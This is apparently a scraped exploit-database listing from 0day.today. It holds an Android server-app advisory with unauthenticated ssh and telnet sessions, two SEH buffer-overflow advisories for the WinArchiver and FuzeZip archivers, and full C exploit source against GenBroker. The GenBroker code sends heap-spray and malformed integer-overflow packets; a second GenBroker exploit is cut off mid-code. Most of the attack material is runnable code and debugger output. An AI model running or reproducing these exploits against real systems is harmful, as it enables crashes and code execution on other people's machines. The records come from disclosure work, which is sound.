"2013-10-04T00:00:00", "id": "1337DAY-ID-21336", "href": "https://0day.today/exploit/description/21336", "type": "zdt", "title": "Ice Cold Apps Servers Ultimate 6.0.2(12) Remote Command Execution", "sourceData": "Multiple vulnerabilities in Ice Cold Apps Servers Ulitmate Version 6.0.2(12) for Android\r\n\r\n9/8/13\r\nLarry W. Cashdollar, @_larry0\r\n\r\nhttp://www.amazon.com/Ice-Cold-Apps-Servers-Ultimate/dp/B00E00C44G/ref=sr_1_1?s=mobile-apps&ie=UTF8&qid=1378688647\r\n\r\nhttp://www.icecoldapps.com\r\n\r\nVulnerabilities\r\n\r\nThere are no credentials by default, authentication is disabled for telnet/ssh/ftp allowing remote access to the device's storage. PHP can be uploaded to the webserver and executed.\r\n\r\n \u2022 ftp server allows writes to lighttp/php* directory.\r\n \u2022 telnet default authentication turned off.\r\n \u2022 ssh server default authentication turned off.\r\n \u2022 Anonymous SOCKS proxy & http/ftp proxy.\r\nSSHD\r\n\r\nlarry$ ssh 192.168.0.29 -p 2222\r\n$ id\r\nuid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $ uptime\r\nup time: 19:42:02, idle time: 18:47:19, sleep time: 00:00:00 $\r\n\r\nTelnet\r\n\r\nlarry$ telnet 192.168.0.29 2323\r\nTrying 192.168.0.29...\r\nConnected to 192.168.0.29.\r\nEscape character is '^]'.\r\n\r\nWelcome to tel!\r\nPlease enter some text to test the connection and hit enter:\r\n\r\n$\r\n$ id\r\nuid=10041(app_41) gid=10041(app_41) groups=1015(sdcard_rw),3003(inet) $\r\n\r\nlighttpd / PHP server\r\n\r\n \u2022 php has the following functions available:\r\nVia\r\n<?php\r\n\r\n $arr = get_defined_functions();\r\n echo \"<pre>\";\r\n print_r($arr);\r\n echo \"</pre>\";\r\n\r\n?>\r\n\r\nReturned 1300 functions, including exec, pass_thru system() and\r\n\r\n [662] => socket_select\r\n [663] => socket_create\r\n [664] => socket_create_listen\r\n [665] => socket_create_pair\r\n [666] => socket_accept\r\n [667] => socket_set_nonblock\r\n [668] => socket_set_block\r\n [669] => socket_listen\r\n [670] 
=> socket_close\r\n [671] => socket_write\r\n [672] => socket_read\r\n [673] => socket_getsockname\r\n [674] => socket_getpeername\r\n [675] => socket_connect\r\n [676] => socket_strerror\r\n [677] => socket_bind\r\n [678] => socket_recv\r\n [679] => socket_send\r\n [680] => socket_recvfrom\r\n [681] => socket_sendto\r\n [682] => socket_get_option\r\n [683] => socket_set_option\r\n [684] => socket_shutdown\r\n [685] => socket_last_error\r\n [686] => socket_clear_error\r\n [687] => socket_import_stream\r\n [688] => socket_getopt\r\n [689] => socket_setopt\r\n\r\n\r\nVendor Notified: 9/10/2013\r\n\r\nThe full list is here:\r\n\r\nhttp://vapid.dhs.org/advisories/ultimate-server-android-vulns.html\r\n\r\n-- Larry\n\n# 0day.today [2018-03-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21336"}, {"lastseen": "2018-02-19T21:25:38", "bulletinFamily": "exploit", "description": "WinArchiver version 3.2 suffers from a SEH-based buffer overflow vulnerability.", "modified": "2013-09-03T00:00:00", "published": "2013-09-03T00:00:00", "id": "1337DAY-ID-21196", "href": "https://0day.today/exploit/description/21196", "type": "zdt", "title": "WinArchiver 3.2 SEH Buffer Overflow Vulnerability", "sourceData": "Title: SEH BUFFER OVERFLOW IN WINARCHIVER V.3.2\r\n Severity: Critical\r\n History: 24.Apr.2013 Vulnerability reported\r\n Authors: Josep Pi Rodriguez, Pedro Guillen Nu\u00f1ez , Miguel Angel de Castro Simon\r\n Organization: RealPentesting\r\n URL: http://www.realpentesting.blogspot.com\r\n Product: WinArchiver\r\n Version: 3.2\r\n Vendor: PowerSoftware\r\n Url Vendor: http://winarchiver.com\r\n Platform: Windows\r\n Type of vulnerability: SEH buffer overflow\r\n Issue fixed in version: (Not fixed)\r\n CVE identifier: CVE-2013-5660\r\n\r\n[ DESCRIPTION SOFTWARE ]\r\n\r\nFrom vendor website:\r\nWinArchiver is a powerful archive utility, which can open, create, and manage archive files. 
It supports almost all archive formats, including zip, rar, 7z, iso, and other popular formats. WinArchiver can also mount the archive to a virtual drive without extraction.\r\n\r\n[ VULNERABILITY DETAILS ]\r\n\r\nWinArchiver suffers from an SEH-based stack buffer overflow.\r\nBelow you can see the debugged process after the SEH overwrite. The structured exception handler (SEH) record has been overwritten with 00410041, a value we control: it is the UTF-16 encoding of two 'A' bytes, and the faulting instruction writes one word at a time (eax=00000041), so the input appears to be widened to Unicode before the copy, which constrains the usable handler addresses and the payload encoding. The proof of concept .zip file was attached to the original mail (it is not included in this listing). You have to open the .zip with WinArchiver and click the extract button in order to trigger the vulnerability.\r\n\r\nRegisters\r\n---------\r\neax=00000041 ebx=000017a6 ecx=043b0000 edx=7fffdf41 esi=043aed84 edi=043aed58\r\neip=004e64cb esp=043ae8cc ebp=043ae8d0 iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\n*** ERROR: Module load completed but symbols could not be loaded for C:\\Archivos de Programa\\WinArchiver\\WinArchiver.exe\r\nWinArchiver+0xe64cb:\r\n004e64cb 668901 mov word ptr [ecx],ax ds:0023:043b0000=????\r\nSeh chain\r\n----------\r\n!exchain\r\n043aff0c: WinArchiver+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\nBy opening a specially crafted zip file, it is possible to execute arbitrary code. We can successfully exploit the vulnerability in order to gain code execution.\r\n\r\n[ VENDOR COMMUNICATION ]\r\n\r\n20/04/2013 : vendor contacted. No response\r\n24/04/2013 : vendor contacted again. No response\r\n29/04/2013: PUBLIC DISCLOSURE\n\n# 0day.today [2018-02-19] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21196"}, {"lastseen": "2018-02-17T23:26:32", "bulletinFamily": "exploit", "description": "FuzeZip version 1.0.0.131625 suffers from a SEH based overflow and stack based overflow which is protected by stack cookies.", "modified": "2013-09-03T00:00:00", "published": "2013-09-03T00:00:00", 
"id": "1337DAY-ID-21194", "href": "https://0day.today/exploit/description/21194", "type": "zdt", "title": "FuzeZip 1.0 SEH Buffer Overflow Vulnerability", "sourceData": "Title: SEH BUFFER OVERFLOW IN FUZEZIP V.1.0\r\n Severity: High\r\n History: 16.Apr.2013 Vulnerability reported\r\n Authors: Josep Pi Rodriguez, Pedro Guillen Nu\u00f1ez , Miguel Angel de Castro Simon\r\n Organization: RealPentesting\r\n URL: http://www.realpentesting.blogspot.com\r\n Product: FuzeZip\r\n Version: 1.0.0.131625\r\n Vendor: Koyote-Lab Inc\r\n Url Vendor: http://fuzezip.com/\r\n Platform: Windows\r\n Type of vulnerability: SEH buffer overflow\r\n Issue fixed in version: (Not fixed)\r\n CVE identifier: CVE-2013-5656\r\n\r\n[ DESCRIPTION SOFTWARE ]\r\n\r\nFrom vendor website:\r\nFuzeZip is a sophisticated, yet easy to use, free compression tool that is based on 7-Zip technology.\r\nFuzeZip's software has a powerful compression engine that enables fast zipping and unzipping of Zip archives, as well as creating Zip-compatible files.\r\nFuzeZip has a user-friendly interface that makes creating, opening, extracting and saving compressed files very easy to do.\r\n\r\n[ VULNERABILITY DETAILS ]\r\n\r\nFuzeZip suffers from a SEH based overflow and stack based overflow which is protected by stack cookies.\r\nAbove you can see the debugged process after the seh overflow:\r\n\r\nRegisters\r\n---------\r\neax=00000041 ebx=00000000 ecx=00130000 edx=048d6798 esi=0012e434 edi=00000008\r\neip=004e8bf3 esp=0012dd10 ebp=0012dd48 iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\n*** ERROR: Symbol file could not be found. 
Defaulted to export symbols for fuzeZip.exe -\r\nfuzeZip!boost::archive::detail::iserializer<boost::archive::xml_wiarchive,std::list<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> >,std::allocator<std::basic_string<wchar_t,std::char_traits<wchar_t>,std::allocator<wchar_t> > > > >::load_object_data+0x41113:\r\n004e8bf3 668901 mov word ptr [ecx],ax ds:0023:00130000=6341\r\nSeh chain\r\n----------\r\n0012de34: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012dfbc: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012e100: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012e2ac: USER32!_except_handler3+0 (7e44048f)\r\n CRT scope 0, func: USER32!UserCallWinProcCheckWow+155 (7e44ac6b)\r\n0012ec1c: fuzeZip+10041 (00410041)\r\nInvalid exception stack at 00410041\r\n\r\nBy opening a specially crafted zip file, it is possible to execute arbitrary code. We can successfully exploit the vulnerability to gain code execution while\r\nbypassing SafeSEH (the overwritten handler resolves to fuzeZip+10041, i.e. inside the main executable, which is therefore presumably not built with /SAFESEH).\r\n\r\n[ VENDOR COMMUNICATION ]\r\n\r\n16/04/2013 : vendor contacted\r\n17/04/2013: automatic response from vendor but no response after\r\n17/04/2013: vendor contacted again but no response\r\n29/04/2013.- PUBLIC DISCLOSURE\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/21194"}, {"lastseen": "2018-01-05T03:05:45", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18889", "href": "https://0day.today/exploit/description/18889", "type": "zdt", "title": "GenBroker <= 9.21.201.01 multiple integer overflows", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in 
Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = \"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = 
\"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n\r\n-------------\r\ngenesis_iof.c\r\n-------------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n #include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include 
<netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple integer overflows \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisories for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x89a;\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x2000, 16);\r\n p += putxx(p, 0x20000001, 32);\r\n p += putxx(p, 0, 32);\r\n break;\r\n }\r\n case 2: {\r\n type = 0x453;\r\n p += putss(p, 
NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 16);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 3: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 4: {\r\n type = 0x4b2;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 5: {\r\n type = 0x4b5;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 6: {\r\n type = 0x7d0;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 7: {\r\n type = 0xDAE;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 8: {\r\n type = 0xfa4;\r\n p += putxx(p, 0x20000001, 32);\r\n break;\r\n }\r\n case 9: {\r\n type = 0xfa7;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 10: {\r\n type = 0x1bbc;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n case 11: {\r\n type = 0x1c84;\r\n p += putss(p, NULL);\r\n p += putss(p, NULL);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, 0x10000001, 32);\r\n break;\r\n }\r\n case 12: {\r\n type = 0x26AC;\r\n p += putxx(p, 0x40000001, 32);\r\n break;\r\n }\r\n default: {\r\n printf(\"\\nError: invalid bug number %d\\n\", bug);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n p += putcc(p, 0x41, BUFFSZ - (p - buff)); // good as string 
size too\r\n // send_gen automatically adjusts the size to 0x1ff4\r\n\r\n // the following part is not needed so can be removed\r\n printf(\"- heap spray packets: \");\r\n fill = malloc(BUFFSZ);\r\n if(!fill) std_err();\r\n f = fill;\r\n f += putxx(f, 340, 32);\r\n f += putss(f, \"parameter\");\r\n f += putss(f, \"value\");\r\n for(i = 0; i < 340; i++) {\r\n f += putss(f, \"AAAA\");\r\n f += putss(f, \"AAAA\");\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n f += putxx(f, 0x41414141, 32);\r\n }\r\n for(i = 0; i < 20; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, 0x4b2, fill, f - fill);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- malformed packets: \");\r\n for(i = 0; i < 10; i++) {\r\n fputc('.', stdout);\r\n sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);\r\n if(sd < 0) std_err();\r\n setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));\r\n if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();\r\n send_gen(sd, type, buff, p - buff);\r\n close(sd);\r\n }\r\n printf(\"\\n\");\r\n\r\n printf(\"- done\\n\");\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz) {\r\n static u8 buff[BUFFSZ];\r\n static int pck = 1;\r\n int t;\r\n u8 *p;\r\n\r\n t = 4 + 4 + 4 + datasz;\r\n if(t > (BUFFSZ - 12)) t = BUFFSZ - 12;\r\n\r\n p = buff;\r\n p += putxx(p, 1, 16);\r\n p += putxx(p, htons(pck++), 16);\r\n p += putxx(p, htonl(1), 32);\r\n p += putxx(p, htonl(t), 32);\r\n\r\n p += putxx(p, 1, 32);\r\n p += putxx(p, 0, 32);\r\n p += putxx(p, type, 32);\r\n if(datasz > 0) p += putmm(p, data, datasz);\r\n\r\n if(send(sd, buff, p - buff, 0) < 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nint putss(u8 *data, u8 *str) {\r\n int 
len;\r\n u8 *p;\r\n\r\n len = 0;\r\n if(str) len = strlen(str);\r\n\r\n p = data;\r\n if(len < 0xff) {\r\n p += putxx(p, len, 8);\r\n } else {\r\n p += putxx(p, 0xff, 8);\r\n p += putxx(p, len, 16);\r\n }\r\n p += putmm(p, str, len);\r\n return(p - data);\r\n}\r\n\r\n\r\n\r\nint putmm(u8 *data, u8 *str, int size) {\r\n if(size < 0) size = strlen(str);\r\n memcpy(data, str, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putcc(u8 *data, int chr, int size) {\r\n memset(data, chr, size);\r\n return(size);\r\n}\r\n\r\n\r\n\r\nint putxx(u8 *data, u32 num, int bits) {\r\n int i,\r\n bytes;\r\n\r\n bytes = bits >> 3;\r\n for(i = 0; i < bytes; i++) {\r\n //data[i] = num >> ((bytes - 1 - i) << 3);\r\n data[i] = num >> (i << 3);\r\n }\r\n return(bytes);\r\n}\r\n\r\n\r\n\r\nint timeout(int sock, int secs) {\r\n struct timeval tout;\r\n fd_set fd_read;\r\n\r\n tout.tv_sec = secs;\r\n tout.tv_usec = 0;\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n if(select(sock + 1, &fd_read, NULL, NULL, &tout)\r\n <= 0) return(-1);\r\n return(0);\r\n}\r\n\r\n\r\n\r\nu32 resolv(char *host) {\r\n struct hostent *hp;\r\n u32 host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if(host_ip == INADDR_NONE) {\r\n hp = gethostbyname(host);\r\n if(!hp) {\r\n printf(\"\\nError: Unable to resolv hostname (%s)\\n\", host);\r\n exit(1);\r\n } else host_ip = *(u32 *)hp->h_addr;\r\n }\r\n return(host_ip);\r\n}\r\n\r\n\r\n\r\n#ifndef WIN32\r\n void std_err(void) {\r\n perror(\"\\nError\");\r\n exit(1);\r\n }\r\n#endif\r\n\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18889"}, {"lastseen": "2018-01-10T19:05:29", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2012-07-01T00:00:00", "published": "2012-07-01T00:00:00", "id": "1337DAY-ID-18890", "href": "https://0day.today/exploit/description/18890", "type": "zdt", "title": "GenBroker <= 9.21.201.01 multiple 
memory free vulnerabilities", "sourceData": "--------\r\nwinerr.h\r\n--------\r\n\r\n/*\r\n Header file used for manage errors in Windows\r\n It support socket and errno too\r\n (this header replace the previous sock_errX.h)\r\n*/\r\n\r\n#include <string.h>\r\n#include <errno.h>\r\n\r\n\r\n\r\nvoid std_err(void) {\r\n char *error;\r\n\r\n switch(WSAGetLastError()) {\r\n case 10004: error = \"Interrupted system call\"; break;\r\n case 10009: error = \"Bad file number\"; break;\r\n case 10013: error = \"Permission denied\"; break;\r\n case 10014: error = \"Bad address\"; break;\r\n case 10022: error = \"Invalid argument (not bind)\"; break;\r\n case 10024: error = \"Too many open files\"; break;\r\n case 10035: error = \"Operation would block\"; break;\r\n case 10036: error = \"Operation now in progress\"; break;\r\n case 10037: error = \"Operation already in progress\"; break;\r\n case 10038: error = \"Socket operation on non-socket\"; break;\r\n case 10039: error = \"Destination address required\"; break;\r\n case 10040: error = \"Message too long\"; break;\r\n case 10041: error = \"Protocol wrong type for socket\"; break;\r\n case 10042: error = \"Bad protocol option\"; break;\r\n case 10043: error = \"Protocol not supported\"; break;\r\n case 10044: error = \"Socket type not supported\"; break;\r\n case 10045: error = \"Operation not supported on socket\"; break;\r\n case 10046: error = \"Protocol family not supported\"; break;\r\n case 10047: error = \"Address family not supported by protocol family\"; break;\r\n case 10048: error = \"Address already in use\"; break;\r\n case 10049: error = \"Can't assign requested address\"; break;\r\n case 10050: error = \"Network is down\"; break;\r\n case 10051: error = \"Network is unreachable\"; break;\r\n case 10052: error = \"Net dropped connection or reset\"; break;\r\n case 10053: error = \"Software caused connection abort\"; break;\r\n case 10054: error = \"Connection reset by peer\"; break;\r\n case 10055: error = 
\"No buffer space available\"; break;\r\n case 10056: error = \"Socket is already connected\"; break;\r\n case 10057: error = \"Socket is not connected\"; break;\r\n case 10058: error = \"Can't send after socket shutdown\"; break;\r\n case 10059: error = \"Too many references, can't splice\"; break;\r\n case 10060: error = \"Connection timed out\"; break;\r\n case 10061: error = \"Connection refused\"; break;\r\n case 10062: error = \"Too many levels of symbolic links\"; break;\r\n case 10063: error = \"File name too long\"; break;\r\n case 10064: error = \"Host is down\"; break;\r\n case 10065: error = \"No Route to Host\"; break;\r\n case 10066: error = \"Directory not empty\"; break;\r\n case 10067: error = \"Too many processes\"; break;\r\n case 10068: error = \"Too many users\"; break;\r\n case 10069: error = \"Disc Quota Exceeded\"; break;\r\n case 10070: error = \"Stale NFS file handle\"; break;\r\n case 10091: error = \"Network SubSystem is unavailable\"; break;\r\n case 10092: error = \"WINSOCK DLL Version out of range\"; break;\r\n case 10093: error = \"Successful WSASTARTUP not yet performed\"; break;\r\n case 10071: error = \"Too many levels of remote in path\"; break;\r\n case 11001: error = \"Host not found\"; break;\r\n case 11002: error = \"Non-Authoritative Host not found\"; break;\r\n case 11003: error = \"Non-Recoverable errors: FORMERR, REFUSED, NOTIMP\"; break;\r\n case 11004: error = \"Valid name, no data record of requested type\"; break;\r\n default: error = strerror(errno); break;\r\n }\r\n fprintf(stderr, \"\\nError: %s\\n\", error);\r\n exit(1);\r\n}\r\n\r\n-----------\r\ngenesis_1.c\r\n-----------\r\n\r\n/*\r\n by Luigi Auriemma\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <stdint.h>\r\n#include <time.h>\r\n\r\n#ifdef WIN32\r\n #include <winsock.h>\r\n #include \"winerr.h\"\r\n\r\n #define close closesocket\r\n #define sleep Sleep\r\n #define ONESEC 1000\r\n#else\r\n #include <unistd.h>\r\n 
#include <sys/socket.h>\r\n #include <sys/types.h>\r\n #include <arpa/inet.h>\r\n #include <netinet/in.h>\r\n #include <netdb.h>\r\n\r\n #define ONESEC 1\r\n#endif\r\n\r\ntypedef uint8_t u8;\r\ntypedef uint16_t u16;\r\ntypedef uint32_t u32;\r\n\r\n\r\n\r\n#define VER \"0.1\"\r\n#define PORT 38080\r\n#define BUFFSZ 0x2000 // 0x4000 is the max but 0x2000 seems more compatible\r\n#define ELEMENTS 0xfff\r\n\r\n\r\n\r\nint send_gen(int sd, int type, u8 *data, int datasz);\r\nint putss(u8 *data, u8 *str);\r\nint putmm(u8 *data, u8 *str, int size);\r\nint putcc(u8 *data, int chr, int size);\r\nint putxx(u8 *data, u32 num, int bits);\r\nint timeout(int sock, int secs);\r\nu32 resolv(char *host);\r\nvoid std_err(void);\r\n\r\n\r\n\r\nint main(int argc, char *argv[]) {\r\n struct linger ling = {1,1};\r\n struct sockaddr_in peer;\r\n int sd,\r\n i,\r\n bug,\r\n type;\r\n u16 port = PORT;\r\n u8 *host,\r\n *buff,\r\n *fill,\r\n *p,\r\n *f;\r\n\r\n#ifdef WIN32\r\n WSADATA wsadata;\r\n WSAStartup(MAKEWORD(1,0), &wsadata);\r\n#endif\r\n\r\n setbuf(stdout, NULL);\r\n\r\n fputs(\"\\n\"\r\n \"GenBroker <= 9.21.201.01 multiple memory free vulnerabilities \"VER\"\\n\"\r\n \"by Luigi Auriemma\\n\"\r\n \"e-mail: [email\u00a0protected]\\n\"\r\n \"web: aluigi.org\\n\"\r\n \"\\n\", stdout);\r\n\r\n if(argc < 3) {\r\n printf(\"\\n\"\r\n \"Usage: %s <bug> <host> [port(%d)]\\n\"\r\n \"\\n\"\r\n \"Bugs:\\n\"\r\n \" refer to the relative advisory for the available numbers\\n\"\r\n \" and what vulnerabilities they test\\n\"\r\n \"\\n\", argv[0], port);\r\n exit(1);\r\n }\r\n\r\n bug = atoi(argv[1]);\r\n host = argv[2];\r\n if(argc > 3) port = atoi(argv[3]);\r\n\r\n peer.sin_addr.s_addr = resolv(host);\r\n peer.sin_port = htons(port);\r\n peer.sin_family = AF_INET;\r\n\r\n printf(\"- target %s : %hu\\n\", inet_ntoa(peer.sin_addr), port);\r\n\r\n buff = malloc(BUFFSZ);\r\n if(!buff) std_err();\r\n\r\n p = buff;\r\n switch(bug) {\r\n case 1: {\r\n type = 0x4b0;\r\n p += putss(p, NULL);\r\n p += 
